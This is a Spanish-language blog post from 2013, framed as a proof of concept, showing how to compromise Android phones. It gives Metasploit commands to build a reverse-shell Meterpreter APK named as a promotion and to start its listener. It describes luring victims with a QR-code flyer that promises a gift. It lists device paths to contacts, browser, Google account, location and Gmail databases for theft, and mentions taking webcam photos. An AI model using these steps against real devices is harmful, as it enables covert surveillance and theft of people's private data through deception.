25 junio, 2013

Android Meterpreter Attack

En este articulo mostrare una prueba de concepto PoC sobre un ataque dirigido a dispositivos móviles en este caso con sistema operativo Android.

Primero que nada empezaremos con actualizar nuestro metasploit.
$ msfupdate  

Después de esto procederemos a crear nuestro payload para Android que se encuentra disponible en el framework de metasploit. Usaremos el msfpayload:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.7.239 R > promocion.apk

En este caso LHOST=  es donde se ingresa la dirección ip hacia donde apuntara la conexión y en seguida especificamos el nombre de nuestra APK.

Con esto se nos generara nuestra aplicación para dispositivos Android.

Ya tenemos la aplicación maliciosa pero como hacemos para que el usuario la descargue? bueno aquí hay muchas técnicas la mayoría basadas en ingeniería Social, en mi caso utilizare mediante un Póster de alguna promoción con un código QR.

Ahora subiremos nuestra aplicación a cualquier servidor, yo la he subido a mi dropbox.

Utilizaremos el SET para poder generar el codigo QR el cual nos redireccione a esta liga.
cd /bugtraq/tools/pentesting/set/
./set

En mi caso estoy utilizando la bugtraq si están en kali o backtrack pueden iniciarlo desde el menu o hacerlo de la ruta donde se encuentra la carpeta del SET.

Una vez iniciado el social engineering toolkit  seleccionamos la opción
1) Social-Engineering Attacks
SET
Seleccionamos la opción
9) QRCode Generator Attack Vector
E ingresamos la url donde hallamos subido nuestra apk.
QR set

[*] [*] QRCode has been generated under /root/.set/reports/qrcode_attack.png!
QRCode generated.

Y con esto tendremos nuestro codigo QR generado.
Ahora me apoyare en esta pagina http://www.flyerfacil.com para poder hacer atractivo nuestro codigo QR, si a las personas les dices que les regalas algo, seguro bajan la aplicación sin saber que es.
1372109039

Y listo aquí ya tenemos nuestro Flyer, ahora es cuestión de ponerlo en una área a la vista del personal donde estemos realizando las pruebas y esperar a que alguien descargue la app.

Para esta prueba usare una Virtual de Android.

Al escanear el código QR se podrá descargar la aplicación

android
Android2
android3

Una vez instalada la aplicación generara la conexión en reversa hacia nosotros

Utilizaremos el comando
msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E
Para ponernos a la escucha.

meterandroid

Y listo una conexión a través de meterpreter con el dispositivo móvil.

Podemos hacer uso del comando webcam_snap  para tomar fotografías del movil, también podríamos extraer archivos.

Aqui algunas rutas que nos pudieran interesar
/data/data/com.android.providers.contacts/databases/contacts.db
/data/data/com.android.browser/databases/browser.db
/data/data/com.google.android.googleapps/databases/accounts.db
/data/data/com.android.browser/gears/geolocation.db
/data/data/com.android.providers.telephony/databases/
/data/data/com.google.android.apps.maps/databases/search_history.db
/data/data/com.google.android.providers.gmail/databases/

Incluso seria posible poder recuperar los mensajes de whatsapp eliminados.
Saludos!

0 comentarios:

Publicar un comentario